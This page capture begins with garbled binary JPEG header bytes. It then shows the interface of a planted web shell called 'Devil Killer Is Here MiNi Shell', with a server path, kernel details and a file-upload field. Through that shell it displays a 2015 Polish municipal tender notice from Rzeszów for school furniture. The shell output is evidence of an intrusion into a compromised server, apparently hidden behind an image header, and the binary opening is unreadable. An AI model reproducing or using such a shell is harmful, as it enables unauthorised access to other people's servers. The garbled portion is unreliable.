JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150508/66507-N-2015.html

<p class="kh_header"><b>Rzeszów: Dostawa mebli do Zespołu Oświatowego przy ulicy Bł. Karoliny</b><br>
<b>Numer ogłoszenia: 66507 - 2015; data zamieszczenia: 08.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Rzeszów - Urząd Miasta  Rzeszowa , Rynek 1, 35-064 Rzeszów, woj. podkarpackie, tel. 017 8754636, faks 017 8754634.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzeszow.pl; bip.erzeszow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli do Zespołu Oświatowego przy ulicy Bł. Karoliny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli do Szkoły Podstawowej Nr 18 i Gimnazjum Nr 4 w Rzeszowie przy ul. Błogosławionej Karoliny 21 wraz z czynnościami takimi jak: zakup, dostawa, montaż i ustawienie dostarczonego wyposażenia, przymocowanie do ścian - jeżeli jest to konieczne. 
Postępowanie podzielone jest na 3 części
Dopuszcza się możliwość składania ofert częściowych.
Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia

Przedmiot zamówienia obejmuje realizację następujących części zamówienia:
Część I - dostawa mebli do sal lekcyjnych, wypożyczalni, czytelni, świetlicy, jadalni, szatni,
Stół  2-os z regulowaną wysokością 5-6 szt. 15
 Krzesło z regulacją wysokości 5-6  szt. 30
Biurko  nauczycielskie szt. 38
Tablica szkolna tryptyk biała 3,40m szt.5
Szafka wodna Szt 5
Szafka z szerokimi półkami  Szt 1
Szafka z szerokimi  7 szufladami  Szt 2
Nadstawka z  3 pólkami   Szt 4
Nadstawka z  1 pólką   Szt 2
Szafka z 3 półkami  Szt 1
Regał oszklony na pomoce  szt. 1
Stół roboczy szt. 16
Nadstawka laboratoryjna  szt. 6
Stół demonstracyjny szt. 1
Szafka wodna z 1 zlewem Szt 2
Szafka wisząca  Szt 6
Stół laboratoryjny  Szt 2
Tablica szkolna pojedyncza 170cm biała szt. 13
Taboret Szt 31
Stół 2-os z regulowaną wysokością 5-6 Szt 81
Stół 1-os z regulowaną wysokością 5-6 Szt 88
Krzesło  z regulowaną wysokością 5-6 Szt 316
Szafa wysoka z witryną w ramie aluminiowej Szt 6
Regał wysoki z szafką szt. 22
Szafa wysoka czterodrzwiowa szt. 52
stół laboratoryjny szt 2
Stolik komputerowy 1-os.  Szt 52
Szafka średnia  Szt 7
Regał średni Szt 2
Regał ekspozycyjny Szt 32
Regał jednostronny wzmocniony - moduł podstawowy Szt 8
Regał jednostronny wzmocniony - moduł dodatkowy Szt 11
Regał dwustronny wzmocniony - moduł podstawowy Szt 16
Regał dwustronny wzmocniony - moduł dodatkowy Szt 25
Stół demonstracyjny 2-szafkowy Szt 1
Stolik uczniowski 3-osobowy  Szt 10
Szafka 6-skrytkowa szt. 60
Ławka szatniowa bez oparcia Szt 47
Stól 1-os z regulowaną wysokością 3-4 Szt 54
Krzesło  z regulowaną wysokością 3-4 Szt 502
Szafka ubraniowa z 9 schowkami   szt. 21
Szafka ubraniowa z 9 schowkami  Szt 21
Szafka ubraniowa 3-modułowa  szt. 1
Szafka ubraniowa 2-modułowa  Szt 1
szafka 6-skrytkowa szt. 54
Szafka 3-skrytkowa  Szt 6
Szafa czterodrzwiowa z wysoką półką  Szt 19
Tablica szkolna tryptyk biała 3,40m kratka-linie-gładki Szt 18
Regał wysoki  z szafką  Szt 35
Stół 2-os z regulowaną wysokością 3-4 Szt 208
Zestaw meblowy zielony Kpl 1
Zestaw meblowy żółty Kpl 1
Zestaw meblowy pomarańczowy Kpl 1
szafka 3-skrytkowa.  Obudowa kolor RAL 7047, dzrwiczki 5015 szt 40
szafka 3-skrytkowa. Obudowa kolor RAL 7047, dzrwiczki 6018 szt. 14
szafka 3-skrytkowa. Obudowa kolor RAL 7047, dzrwiczki 2008 szt 14
Stół  świetlicowy  regulowany w zakresie 3-4 szt. 15
Krzesełka o regulowanej wysokości 3-4 z siedziskiem i oparciem wykonanym z barwionej sklejki bukowej  szt. 57
Krzesełka o regulowanej wysokości 3-4 z siedziskiem i oparciem wykonanym z barwionej sklejki bukowej. szt. 57
Krzesełka regulowanej wysokości 3-4 z siedziskiem i oparciem wykonanym z barwionej sklejki bukowej. szt. 24
Zestaw meblowy 1 Kpl 1
Zestaw meblowy 2 Kpl 1
Zestaw meblowy 3 Kpl 1
Schowki szatniowe Szt 6
Stół  świetlicowy  regulowany w zakresie 3-4 szt. 6
Stoły na stelażu metalowym z nogami okrągłymi 120x80 szt. 4
Stoły na stelażu metalowym z nogami okrągłymi 160x80 szt. 4
Krzesełka o regulowanej wysokości 5-6 z siedziskiem i oparciem wykonanym z barwionej sklejki bukowej  Szt 28
Krzesełka o regulowanej wysokości 5-6 z siedziskiem i oparciem wykonanym z barwionej sklejki bukowej  Szt 28
Dostawa i montaż mebli i wyposażenia Kpl 1

Część II - dostawa mebli biurowych, 
Krzesło obrotowe  szt.40
Lady recepcyjne - zestaw Kpl 2
Biurko w kształcie litery L  Szt 2
Kontener stacjonarny   Szt 2
Stół konferencyjny kwadratowy  Szt 1
Szafa z drzwiami przesuwnymi  Szt 4
Szafa  bez drzwi z 2 półkami Szt 2
Szafa ubraniowa  Szt 2
Szafa aktowa ze  skarbczykiem Szt 2
Gablota ekspozycyjna  Szt 1
Krzesło na płozach Szt 12
Biurko prostokątne  Szt 2
Kontener mobilny  Szt 2
Szafa z drzwiami przesuwnymi  Szt 2
Szafa ubraniowa  Szt 1
Szafa aktowa  Szt 6
Krzesło na podstawie jezdnej  Szt 3
Biurko prostokątne Szt  2
Kontener mobilny Szt 2
Panel recepcyjny środkowy Szt 2
Panel recepcyjny boczny  Szt 1
Blat do panela  Szt 2
Dostawka prostokątna Szt 1
Stolik do krótkich spotkań  Szt 1
Krzesło konferencyjne   szt. 40
Stól konferencyjny  szt. 9
Szafa ubraniowa  Szt 2
Szafa wysoka z 10 schowkami  Szt 4
Dostawa i montaż mebli i wyposażenia Kpl 1

Część III - dostawa foteli audytoryjnych.
Dostawa 238 szt. foteli audytoryjnych do sali audytoryjnej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1, 39.11.31.00-8, 39.13.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości:
Dla części I : 11 000,00 zł (słownie: jedenaście tysięcy złotych 00/100)
Dla części II: 1 000,00 zł (słownie: tysiąc złotych 00/100)
Dla części III: 2 500,00 zł (słownie: dwa tysiące pięćset złotych 00/100)

2.	Wadium należy wnieść do upływu terminu składania ofert oznaczonego datą i godziną. Niewniesienie wadium do upływu wyznaczonego terminu (oznaczonego datą i godziną) skutkuje wykluczeniem wykonawcy na podstawie art. 24 ust. 2 pkt 2 Pzp.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Urzędu Miasta Rzeszowa PKO BP S.A. nr rachunku: 55 1020 4391 0000 6702 0144 6830. Tytuł przelewu winien umożliwić identyfikację przetargu, którego dotyczy wadium oraz określać podmiot w którego imieniu jest wpłacane - w przypadku jeśli przelewu nie dokonuje Wykonawca składający ofertę. Celem właściwej identyfikacji wpłaty z tytułu wadium powinny zawierać w tytule przelewu znak sprawy postępowania tj. ZP.271.1.22.2015. Za skuteczne wniesienie wadium w pieniądzu rozumie się gdy w wyznaczonym terminie, tj. do upływu terminu składania ofert (oznaczonego datą i godziną) nastąpi uznanie kwoty wadium na rachunku bankowym Zamawiającego.
5.	Wadium w innej formie niż pieniądz należy złożyć w sekretariacie Wydziału Zamówień Publicznych przy ul. Joselewicza 4, pok. nr 13 w formie oryginału. Prosimy nie załączać do oferty oryginału gwarancji lub poręczenia. Wadium w formie poręczenia lub gwarancji musi obejmować cały okres związania ofertą, a beneficjentem takich dokumentów musi być Zamawiający. 
Gwarancja/poręczenie musi być podpisana przez przedstawiciela Gwaranta. Podpis winien być złożony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji/poręczenia winno wynikać bezwarunkowe i nieodwołalne zobowiązanie Gwaranta do wypłaty Zamawiającemu, na jego pierwsze żądanie, pełnej kwoty wadium we wszystkich  okolicznościach określonych w art. 46 ust. 4a i 5 Pzp. 
6.	Wykonawcy, którego oferta zostanie wybrana, Zamawiający zatrzyma wadium wraz z odsetkami w przypadku gdy:
1)	odmówił podpisania umowy na warunkach określonych w ofercie,
2)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
Ponadto Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.  
7.	Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub po unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Pzp. Wadium wniesione w formie przelewu, będzie zwracane na konto z którego wpłynęło, o ile Wykonawca nie wskaże innego numeru konta. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego z zastrzeżeniem art. 148 ust. 4 Pzp.


VIII. Termin związania ofertą
1.	Wykonawca będzie związany ofertą 30 dni od terminu składania ofert. 
2.	Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku dla części I,II,III: 
Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania uprawnień.  Zamawiający uzna warunek za spełniony, kiedy wykonawca złoży oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 Pzp - zawarte w druku OFERTA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku dla części I: 
Zamawiający uzna warunek za spełniony, kiedy wykonawca wykaże,  że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zamówienie na dostawę wyposażenia mebli o wartości minimum 300 000,00 zł brutto (słownie: trzysta tysięcy złotych 00/100). 
Przez jedno zamówienie rozumie się jedną umowę.
Opis sposobu dokonywania oceny spełniania warunku dla części II,III: 
Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca złoży oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 Pzp - zawarte w druku OFERTA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku dla części I,II,III: 
Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca złoży oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 Pzp - zawarte w druku OFERTA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku dla części I,II,III: 
Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca złoży oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 Pzp - zawarte w druku OFERTA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku dla części I: 
Zamawiający uzna warunek za spełniony, kiedy wykonawca wykaże,  że posiada środki finansowe lub zdolność kredytową w wysokości 500 000 zł (brutto)
Opis sposobu dokonywania oceny spełniania warunku dla części II,III: 
Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca złoży oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 Pzp - zawarte w druku OFERTA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający nie wymaga informacji o dostawach niewykonanych lub wykonanych nienależycie. Zamawiający żąda wskazania przez wykonawce w wykazie głównych dotaw  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie na dostawę wyposażenia mebli o wartości minimum 300 000,00 zł brutto (słownie: trzysta tysięcy złotych 00/100) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączenie dowodów, czy zostały wykonane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony i podpisany druk OFERTA
2)	Dokumenty niezbędne do przyznania punktów w innych kryteriach niż cena: 
- oświadczenie o okresie gwarancji zawarte w druku OFERTA.
    
Uwaga:
Dokument wymieniony w pkt 5.2) SIWZ, wymagany jest w celu ustalenia ilości punktów w kryterium okres gwarancji. Brak określenia okresu gwarancji w druku OFERTA skutkować będzie przyjęciem, że wykonawca zaoferował minimalny dopuszczalny okres gwarancji - tj. 24 miesiące i przyznaniem 0 punktów w niniejszym kryterium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - okres gwarancji - 4</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega, że w przypadku niezakończenia realizacji etapu pierwszego zadania inwestycyjnego, tj. budowy budynku Zespołu Oświatowego przy ul. Bł. Karoliny w Rzeszowie, termin rozpoczęcia realizacji zadania może ulec zmianie, z tym że 28 dniowy okres realizacji zamówienia będzie zachowany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.erzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Rzeszowa, Wydział Zamówień Publicznych, 35-064 Rzeszów, ul. Joselewicza 4, pok. nr 13..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2015 godzina 11:00, miejsce: Oferty należy złożyć na adres: Urząd Miasta Rzeszowa, Wydział Zamówień Publicznych, 35-064 Rzeszów, ul. Joselewicza 4, pok. 13,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia należy wykonać w terminie 28 dni od dnia wskazanego pisemnie przez Zamawiającego, z tym, że bieg terminu realizacji rozpocznie się nie później niż 20 lipca 2015 r. 

Zasoby innych podmiotów:
Zgodnie z art. 26 ust. 2b Pzp wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (w formie oryginału lub kopii poświadczonej przez notariusza) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 
Obowiązkiem wykonawcy w przypadku, gdy korzysta z potencjału podmiotów trzecich, jest rzeczywiste wykazanie, że tym potencjałem będzie dysponował. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b Pzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.

Treść zobowiązania innego podmiotu do oddania do dyspozycji niezbędnych zasobów powinna określać: 
a)	kto jest podmiotem przyjmującym zasoby (nazwa i adres wykonawcy składającego ofertę),
b)	kto jest podmiotem oddającym zasoby (nazwa i adres podmiotu oddającego do dyspozycji zasoby),
c)	nazwa zamówienia publicznego, przy realizacji którego zasoby będą udostępniane,
d)	zakres udostępnianych zasobów:
wiedza i doświadczenie w zakresie potwierdzenia spełniania warunku, potencjał techniczny rodzaj, nazwa, model, osoby zdolne do wykonania zamówienia imię i nazwisko, funkcja lub  zakres wykonywanych czynności, zdolności finansowe i ekonomiczne, 
e)	sposób wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia (np. podwykonawstwo, konsultacje, doradztwo). W sytuacji gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia. W przypadku gdy inny podmiot będzie brał udział w realizacji zamówienia w charakterze podwykonawcy należy wskazać część zamówienia, którą będzie realizował,
